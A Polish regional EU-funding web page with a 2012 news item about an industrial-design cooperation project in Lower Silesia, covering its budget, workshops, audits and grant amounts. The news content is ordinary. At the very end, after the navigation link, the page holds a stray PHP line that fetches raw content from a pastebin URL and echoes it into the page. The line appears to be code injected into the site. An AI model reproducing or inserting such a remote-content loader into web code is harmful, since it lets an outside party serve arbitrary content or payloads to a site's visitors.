Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

27.08.2012 Projekt systemowy „Dolnośląska Sieć Wzornictwa Przemysłowego”

W dniu 20 sierpnia 2012 r. Zarząd Województwa Dolnośląskiego podjął Uchwałę nr 2758/IV/12 w sprawie określenia zasad realizacji projektu systemowego pt.: „Dolnośląska Sieć Wzornictwa Przemysłowego”. Projekt jest realizowany przez Samorząd Województwa Dolnośląskiego w partnerstwie z Gminą Wrocław oraz Akademią Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, w ramach Priorytetu VIII Regionalne Kadry Gospodarki, Działanie 8.2 Transfer wiedzy, Poddziałanie 8.2.1 Wsparcie dla współpracy sfery nauki i przedsiębiorstw Programu Operacyjnego Kapitał Ludzki.

Okres realizacji projektu to 01.04.2012 r. – 31.12.2014 r., jego budżet wynosi 2 807 530,00 PLN.

Głównym celem przedsięwzięcia jest stworzenie modelu wsparcia innowacyjności i wzmocnienia powiązań sfery nauki i biznesu w zakresie stosowania wzornictwa przemysłowego na Dolnym Śląsku  do XII 2014 r., poprzez umożliwienie współpracy 20 przedstawicieli nauki i 100 dolnośląskich przedsiębiorstw.

Grupę docelową projektu stanowią projektanci będący pracownikami naukowymi (20 os.), projektanci będący przedsiębiorcami - absolwenci kierunków wzorniczych oraz pokrewnych (40 os.) oraz przedsiębiorstwa mające zapotrzebowanie na prace rozwojowe w zakresie wzornictwa.  W ramach projektu przewidziano 4 cykle warsztatów dla przedsiębiorców (60 os.), 4 cykle warsztatów dla pracowników naukowych (60 os.) oraz 8 warsztatów sieciujących  z zakresu współpracy producentów, pracowników naukowych, doktorantów i projektantów praktyków w różnych subregionach Dolnego Śląska. Ponadto zaplanowano opracowanie metodologii i przeprowadzenie przez ekspertów 40 audytów technologicznych w przedsiębiorstwach w zakresie wykorzystania wzornictwa oraz oceny potencjału potrzeb z zakresu wzornictwa. W oparciu o wyniki audytów w 10 przedsiębiorstwach powołane zostaną zespoły nadzorujące wykonanie wdrożeń (np. dokumentów wdrożeniowych studiów wykonalności lub prototypów dla nowych produktów i usług). Wdrożenie w ramach projektu będzie finansowane na poziomie 15 000 PLN w jednej firmie, w zakresie usług wzorniczych oraz 10 000 PLN na towarzyszące usługi techniczne/technologiczne. Dodatkowo możliwe będzie sfinansowanie eksperckich usług doradczych służących komercjalizacji wdrożeń (np. z dziedziny prawa, marketingu) o wartości do 5 000 PLN.

Jednocześnie, w ramach promocji projektu planuje się m in. opracowanie 2 wystaw w zakresie wykorzystania wzornictwa przemysłowego, które będą prezentowane na terenie Dolnego Śląska w okresie realizacji projektu oraz 11 audycji telewizyjnych w celu podniesienia świadomości i pokazania możliwości wykorzystania wzornictwa w produkcji przemysłowej.


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");